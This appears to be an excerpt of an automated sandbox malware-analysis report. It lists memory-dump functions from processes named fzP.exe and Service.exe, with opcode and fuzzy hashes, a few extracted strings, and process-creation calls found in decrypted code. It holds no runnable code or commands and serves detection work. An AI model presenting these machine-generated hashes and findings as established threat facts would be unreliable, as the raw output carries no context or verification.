Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e57d660f3665c0f6c2d3e3f5cf61f7b27c8c5cdebae2cbf19e98ba404b294c8
Instruction ID: 6221e0d3e7d0905a992f3a53c7901f95003c86bfe409d782ac592ff429b2a267
Opcode Fuzzy Hash: 4e57d660f3665c0f6c2d3e3f5cf61f7b27c8c5cdebae2cbf19e98ba404b294c8
Instruction Fuzzy Hash: 18316BB090024ADFCB05EFB8D8546AE7BB2FF85310F2085B9E405AB751DB386A95CB51

Function 02F30BD8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8448027e7364a3ca2bb088f6b8bfea28eab632a458e983e81ff7fc73e4213d51
Instruction ID: ec66abcd7b15b61771ba4492b2be2552a008efcb0762f06d24acf9eb1217ea23
Opcode Fuzzy Hash: 8448027e7364a3ca2bb088f6b8bfea28eab632a458e983e81ff7fc73e4213d51
Instruction Fuzzy Hash: 097182717002068FCB15EF78D85866E7BA3FF88710B104979E9169B795DF38AC099B81

Function 02F30BC8 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d22f0a8e6cd55aa8b4d5012dbd369448c33002ba1f40f0d61f3f183976b96942
Instruction ID: 562ecf05688abcc5e11c4b2a36e9e09aad30053c6755ad293c069b67ba7ae6f8
Opcode Fuzzy Hash: d22f0a8e6cd55aa8b4d5012dbd369448c33002ba1f40f0d61f3f183976b96942
Instruction Fuzzy Hash: CD4172716013068FCB19EF78D46866E7BA3FF84750310493DE81A9BA94DF38AC49DB81

Function 02F31771 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d30de61912f46be55a94256b1ca5dbbe318ca184c4a5888e461cf985c42465
Instruction ID: 555c65327b66c68fe18af46494feff58da6b40a275ac618cc592eab90d223b98
Opcode Fuzzy Hash: 81d30de61912f46be55a94256b1ca5dbbe318ca184c4a5888e461cf985c42465
Instruction Fuzzy Hash: 24219271B1020A9FCB45AFBD48543BFBAEAEFC9250B15443DC55AD7781DE348C0687A1

Function 02F31660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dc069e6124b0eef7ee4ea3e86f0676e6cb806f6d60f622159af09cfdc3f6693
Instruction ID: 1e9f43a63694e3979cc76012f76b6a295389f56233ee65e8a76433c090f21553
Opcode Fuzzy Hash: 0dc069e6124b0eef7ee4ea3e86f0676e6cb806f6d60f622159af09cfdc3f6693
Instruction Fuzzy Hash: 0B217FB090020ADFCB05EFB8D8446AD7BB6FF88304F204579E505A7740DB396E95CB91

Function 02F30CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9177028c5b9555a88c386192f63a06d21eff7652a14255b2ed7ba0db0852b3d8
Instruction ID: b8eb848de937594a540b16d60f68112b2f6dba7e7ceaef8f5209df504c161ff1
Opcode Fuzzy Hash: 9177028c5b9555a88c386192f63a06d21eff7652a14255b2ed7ba0db0852b3d8
Instruction Fuzzy Hash: F72184717007428BCB2AEB79841852E7AE6FF842543104D2DD56B9B780DF34DC0D8BC2

Function 02F30838 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8287478f7c8659e921981bf95665e13f6524204840f47352ac29749db2c06b0a
Instruction ID: 76601c1bf4356fb503c2d4f93edb03bf5087cdd19427343fe9ff2dc302d17a1b
Opcode Fuzzy Hash: 8287478f7c8659e921981bf95665e13f6524204840f47352ac29749db2c06b0a
Instruction Fuzzy Hash: 041154B0101247DFCB01EF28F851A553BB6FB847107244AB8F804ABA25D67D7D59CF81

Function 02F30848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2354529722.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2f30000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f625db19a8a74d631c1c7caf1183cffbe152a5e5d85b3f0c357ace85eca899e
Instruction ID: 18893440b5e71ed86a2913cb9a2b080d4fab0f64d69ab135bcab65b6699a6398
Opcode Fuzzy Hash: 2f625db19a8a74d631c1c7caf1183cffbe152a5e5d85b3f0c357ace85eca899e
Instruction Fuzzy Hash: 240100F0101207DFCB01EF18F881A453BB6F784714B248AB8B804ABA15D67D7D59DF81

Analysis Process: fzP.exePID: 2260, Parent PID: 5396COMMON

Executed Functions

Function 01730901 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

Haq, xrefs: 0173095D

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 4cc2f2c54c8aeca59e10ec587d96ba513c2c5c0c7a267162b63d27676dce6d32
Instruction ID: 328cdf208a5c7a497db142356daf5d708b24138c4aec720bedc6b3c3fae88233
Opcode Fuzzy Hash: 4cc2f2c54c8aeca59e10ec587d96ba513c2c5c0c7a267162b63d27676dce6d32
Instruction Fuzzy Hash: C621B030A05208CFDB48EFB8C5142ADBFB2AB85340F1584BAD549DB296DB348E06CB81

Function 01731304 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5146e6d78b4351fa24c9e68aab2d2e10368a3face73f39f0009253f3ffb3dc64
Instruction ID: 02f0c114f71ab07c6d5b515fa8bf53cea8960d3f829f4ca4e2a90de740c0058d
Opcode Fuzzy Hash: 5146e6d78b4351fa24c9e68aab2d2e10368a3face73f39f0009253f3ffb3dc64
Instruction Fuzzy Hash: B131917090124ADFCB05EFB8D8446AEBBB2FF84304F2445B9E805A7355DB385A59CB52

Function 01730BD8 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fb147add3cad154af1d2962644c3c6e3d5b045715020219ac1f9127bc9ccf8
Instruction ID: fcd7f8f675e21b1c801f8476583d9938ca0a7e9d3299d7eca14e73bcf14a92fa
Opcode Fuzzy Hash: c1fb147add3cad154af1d2962644c3c6e3d5b045715020219ac1f9127bc9ccf8
Instruction Fuzzy Hash: 7A71B2717012068FCB19EF79D85866E7BA2FF84701B10897DE806DB3A5DF789C058B91

Function 01730BCB Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5e5b0f20f1510c0b72114d5448a1adf032cb7fee3c87f64e7d6575fd6f7236
Instruction ID: f15718cc80920ef2468844361089a8b7577bc4d91f0e26b50ae548ef79985632
Opcode Fuzzy Hash: 3c5e5b0f20f1510c0b72114d5448a1adf032cb7fee3c87f64e7d6575fd6f7236
Instruction Fuzzy Hash: 5A4184716012068FCB29EF79E45856EBBA3FF842117104A3DE807976A9DF789C058F92

Function 01731771 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b76200dc1426ca01efb3b155025844e2da5edb02954f8b1c09c0e34c47b113a
Instruction ID: dac51825ccc3491ff7c144d887527f0d8847bc239a4e22f05ee884dc05560569
Opcode Fuzzy Hash: 1b76200dc1426ca01efb3b155025844e2da5edb02954f8b1c09c0e34c47b113a
Instruction Fuzzy Hash: 3021D7B0F002065FCB08EFBE481426FBEEAAFD9250B15883ED54AD7395DE348C0147A1

Function 01731660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a528577adc77d594eb6096b9a55abc9ff77f2879c2e1b76b262853ce64626b79
Instruction ID: cf3212fa6fb78e8380b919a49afc47d7d890e88decde4a5081ab4ed6b148c140
Opcode Fuzzy Hash: a528577adc77d594eb6096b9a55abc9ff77f2879c2e1b76b262853ce64626b79
Instruction Fuzzy Hash: E821447490120ADFCB05EFB8D84465D7BB6FF84304F204579E805A7354DB785E95CB51

Function 01730CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4fd61b460ce871fb2da3bdd51aed24ca9ab1528f4b187f3f4a116e37bea15e
Instruction ID: a6c0bbcf59e87cd49a8ab2b370b1603c8982f472c8a2bf61f5a5bc0f6a9bc1ae
Opcode Fuzzy Hash: 0f4fd61b460ce871fb2da3bdd51aed24ca9ab1528f4b187f3f4a116e37bea15e
Instruction Fuzzy Hash: 32214F72701A424FCB6EEB7A945856E7AE2FFC46143108D3DD06A8B694DF34DC054B92

Function 01730838 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2cf28d43d38b2706b4fd6110dd52cd37f6606ef6bc842100ac8b5d5000b1374
Instruction ID: 002312c81cd1f89339d317d8a141f82edfd0f458f8b4b8165450756a6ae471a9
Opcode Fuzzy Hash: e2cf28d43d38b2706b4fd6110dd52cd37f6606ef6bc842100ac8b5d5000b1374
Instruction Fuzzy Hash: 60112470502246DFCB01EF28F840A557BB6F741304B245AB8EC08AB226D77C6D4ECF82

Function 01730848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2354050208.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1730000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b4a152aa31630144b016e8d4d9706e57d73a18da4ffe9d139f69726ca563e7
Instruction ID: 1998cbe327af433132ea9f1051f0f323145ba7ce715111970207a58f1324deec
Opcode Fuzzy Hash: e5b4a152aa31630144b016e8d4d9706e57d73a18da4ffe9d139f69726ca563e7
Instruction Fuzzy Hash: 1C017D70512206DFCB01EF58F980A5577A6F744305B209AB8BC08AB229D77C6D5E9F92

Analysis Process: fzP.exePID: 5572, Parent PID: 5396COMMON

Executed Functions

Function 00860EE0 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

Ij, xrefs: 0086113A
Xaq, xrefs: 00860EFF

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID: Xaq$Ij
API String ID: 0-1461021075
Opcode ID: c01681a565635949ecd7a8ae181054aed982f1599da2ee6063941e92328a47b6
Instruction ID: 418b243c95113db0d89d076819c4342e203b3035fdc7b5a664f883c5a9520bc9
Opcode Fuzzy Hash: c01681a565635949ecd7a8ae181054aed982f1599da2ee6063941e92328a47b6
Instruction Fuzzy Hash: 22B19D34B002189FDB589F78985867E7BB7FFC8710B19C46AE506EB395CE349C029B91

Function 00860901 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

Haq, xrefs: 0086095D

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: 7b4e9ea7a8660b39867c72c07d73fc4c7a11092468f580b7b19ec815832fdde9
Instruction ID: 4777d621f3275ceb0dd1ea2818e5065ac2ed38ab48aaf247240cee681230453b
Opcode Fuzzy Hash: 7b4e9ea7a8660b39867c72c07d73fc4c7a11092468f580b7b19ec815832fdde9
Instruction Fuzzy Hash: B0217930A05148DFCB48EFB894657AEBFB2FF88300F1084A9C449DB692EB304E55CB91

Function 00861304 Relevance: .6, Instructions: 556COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a37a0a3ac89d8155ef54d547b0f4790fead377ccd3ff728b2bcb61471ac163c
Instruction ID: d8eefc908abc7c84e7870f64523e04587416c27e65d1e95a5f29bea59bff4234
Opcode Fuzzy Hash: 8a37a0a3ac89d8155ef54d547b0f4790fead377ccd3ff728b2bcb61471ac163c
Instruction Fuzzy Hash: C231C178900246DFDB41EFB8D8457AD7FB2FF89304F2089A9E005AB352EB705A55CB51

Function 00860BD8 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e416066949ed42d432aa65ba8975c05e43b260e6506075b3574e724345651e
Instruction ID: 4d41544ec4e98a3cbc4bca23297e140956cfc68b328442f345684c3bfba35489
Opcode Fuzzy Hash: e0e416066949ed42d432aa65ba8975c05e43b260e6506075b3574e724345651e
Instruction Fuzzy Hash: 3171AE757002068FCB59EF78D85866E7BF6FF88700B208968E406DB7A5DF34AC158B91

Function 00860BC8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4ce842946b53ddf65f2957616aec819f5cd18c4f60eefbe9812f9ba0f5ff72
Instruction ID: 44e69ee595a944d581490aa68a1c427ca067dc6299989cb48664ebb0bed7142f
Opcode Fuzzy Hash: ba4ce842946b53ddf65f2957616aec819f5cd18c4f60eefbe9812f9ba0f5ff72
Instruction Fuzzy Hash: F4416F756006068FCB5AFF78D8581AE7BA6FF847043208A7CE4079B694EF749C158F81

Function 00861771 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b0715ca9fc91950007882c7f54bb700a7c75b104fa764b5654ce70ca3c1bd62
Instruction ID: 4349384bd1daf175d2f00cf4265b5a85af17ce3e2e39ed34739be4db33376267
Opcode Fuzzy Hash: 9b0715ca9fc91950007882c7f54bb700a7c75b104fa764b5654ce70ca3c1bd62
Instruction Fuzzy Hash: FF21A4B5F042495FCB44AFBD48542AFBEEAEFC9300B15846DD14AD7392DE348C018762

Function 00861660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb3ca010b0a9f8b910565a7f9b6c2700b9ac52ac4a9de2e8d52ed47b11ea17bd
Instruction ID: a034b2069bec8cb1233395cdb97bbe77c2f266b272d8e20aba7eec54313ecc20
Opcode Fuzzy Hash: cb3ca010b0a9f8b910565a7f9b6c2700b9ac52ac4a9de2e8d52ed47b11ea17bd
Instruction Fuzzy Hash: 7B21A67890020ADFCB45EFB8D84569D7BF6FF84300F208978E405AB354DB705A91CB91

Function 00860CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2e8101a1975c3037ebc5ffeb83593f17e6f405fea5f665c4f0d07f02a7b930d
Instruction ID: 067f7b1f35e50a76160e0d3eff7e27ae14fa92eba394b15d6e18e54ab8adb56f
Opcode Fuzzy Hash: b2e8101a1975c3037ebc5ffeb83593f17e6f405fea5f665c4f0d07f02a7b930d
Instruction Fuzzy Hash: 56216D72700A024BCB5ABB7DC85816E7AE6FF842543108D3CD16ACB690DF34ED098B92

Function 00860838 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed3c7cb406292ef4760812b743033483ff958e1dcb46bdec70b0c6d22c3c986
Instruction ID: 959ee2068bdd125ea210e32a19a1e1062a07f390c40e42b5ca4cb1fa4ebe467f
Opcode Fuzzy Hash: fed3c7cb406292ef4760812b743033483ff958e1dcb46bdec70b0c6d22c3c986
Instruction Fuzzy Hash: DC11EF781012468FC742FF64F941A553BF2FB457047249E74F404AF229E7B46D659F80

Function 00860848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2353689702.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_860000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6cef6e147714786813632d8cb093ac1f15f46c4437e4564c00467f2463b87b2
Instruction ID: 0d4b79220605df580e152f58b5a0e47d0edd78a538df69b27a9cd5a4af4bd71b
Opcode Fuzzy Hash: e6cef6e147714786813632d8cb093ac1f15f46c4437e4564c00467f2463b87b2
Instruction Fuzzy Hash: 6E019B785012079FCB42FF68F981A5577F6FB44704B209E74B404AF229E7B46AA58F80

Analysis Process: Service.exePID: 6984, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	32.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	4

Executed Functions

Function 02DE1B9C Relevance: 1.7, APIs: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DE1D79

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d5208744adf46cfcf278b279af7613e8f789001afd6291ca9a3b9d603eadb137
Instruction ID: c31f00abba5ef973d2c402980feb3a476caf5189760fde87d5d1f54049d03da2
Opcode Fuzzy Hash: d5208744adf46cfcf278b279af7613e8f789001afd6291ca9a3b9d603eadb137
Instruction Fuzzy Hash: F481B1B4D00229DFDB21DFA9C884BDDBBF5AB09300F1091AAE509B7250DB709E89DF55

Function 02DE5C6C Relevance: 1.7, APIs: 1, Instructions: 225
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DE5E49

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e193eb444ab90d5ba0cd7ab95d1f0e28cc970d3a6fde223979a15d8dacb04868
Instruction ID: 8695772907a8f01265d12ce9d1c80cc89ca99145c7e4cf5fae2833fb98c8d2e3
Opcode Fuzzy Hash: e193eb444ab90d5ba0cd7ab95d1f0e28cc970d3a6fde223979a15d8dacb04868
Instruction Fuzzy Hash: A981D3B4D00219DFDF21DFA9D884BEDBBF5AB09304F1091AAE509B7260DB309A85CF55

Function 02DE4E34 Relevance: 1.7, APIs: 1, Instructions: 224
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DE5011

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 09e8f52a0468a0b544e9ee03941ff02bf016d917164cd58212ee508c0e2634a1
Instruction ID: 5e54acb11a5f785d9d3d8ce4bd3a5aeba6c7407076dc368c49008892bf8e4dbb
Opcode Fuzzy Hash: 09e8f52a0468a0b544e9ee03941ff02bf016d917164cd58212ee508c0e2634a1
Instruction Fuzzy Hash: BD81D1B4D002598FDF21DFA9D880BDDBBF1BB49304F1091AAE509B7260DB309A89CF55

Function 02DE4024 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02DE7081

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8cecaae3b22b263a302a73580aa1cb2dfe7b9204ee14068323a9b5dded2a3fac
Instruction ID: 9130e1df5ec13b6055df3a3df3ed8488fbe7b19a98dbb1c58a4b0db15b6be3bb
Opcode Fuzzy Hash: 8cecaae3b22b263a302a73580aa1cb2dfe7b9204ee14068323a9b5dded2a3fac
Instruction Fuzzy Hash: 4A81C1B4D00259DFDF21DFA9C884BDDBBB5BB09300F1091AAE509B7250DB70AA89CF55

Function 02DE614C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02DE7EB9

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2a45ae1fdc29f08ca780938b6b45f2cb1f0ff225408f692aacd409c6651613c6
Instruction ID: de20637535fa629b8e841696da9a67535cf4a223907532e89d71ecbf5947c467
Opcode Fuzzy Hash: 2a45ae1fdc29f08ca780938b6b45f2cb1f0ff225408f692aacd409c6651613c6
Instruction Fuzzy Hash: ED81D0B4D00219CFDF60DFA9C884BEDBBB5BB49304F0091AAE509B7250DB30AA85CF55

Function 02DE7CDC Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02DE7EB9

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 077d40e9ba1db9721a8aa066801cf5e07d8867e567fd3d322ef28e47723de005
Instruction ID: e4d0882773fff173d903542300f59482e466269dd27a7fe30f43cab123e9cb63
Opcode Fuzzy Hash: 077d40e9ba1db9721a8aa066801cf5e07d8867e567fd3d322ef28e47723de005
Instruction Fuzzy Hash: F581C2B4D00219DFDF60DFA9C884BEDBBB5BB49304F1091AAE509B7250DB309A85CF55

Function 02DE6EA4 Relevance: 1.7, APIs: 1, Instructions: 221
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02DE7081

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 55f6fd502f58a0f0398494161d0e68e455d3f12a1643dce88eae8e5b0e5e8178
Instruction ID: 9cc7f2e575f7b968b9c69b0a0480ed6a426a922922a65c9dd920c3523a10ed9d
Opcode Fuzzy Hash: 55f6fd502f58a0f0398494161d0e68e455d3f12a1643dce88eae8e5b0e5e8178
Instruction Fuzzy Hash: D881D2B4D00259CFDF21DFA9C880BDDBBB5BB09300F1091AAE509B7250DB709A89CF55

Function 02DE1BA8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DE1D79

Memory Dump Source

Source File: 00000017.00000002.2404007710.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2de0000_Service.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d41712e4875ee8e8c3731c511a740cc2a36c7120dea6a6128216cfd4509a0f9f
Instruction ID: 9a5b49ebc397ded6bad802ef1769d8851878a513c7cdd1905ee79a2896dbc96b
Opcode Fuzzy Hash: d41712e4875ee8e8c3731c511a740cc2a36c7120dea6a6128216cfd4509a0f9f
Instruction Fuzzy Hash: D881C1B4D00229DFDF21DFA9C880BDDBBB5AB09300F1091AAE509B7250DB709E89CF55

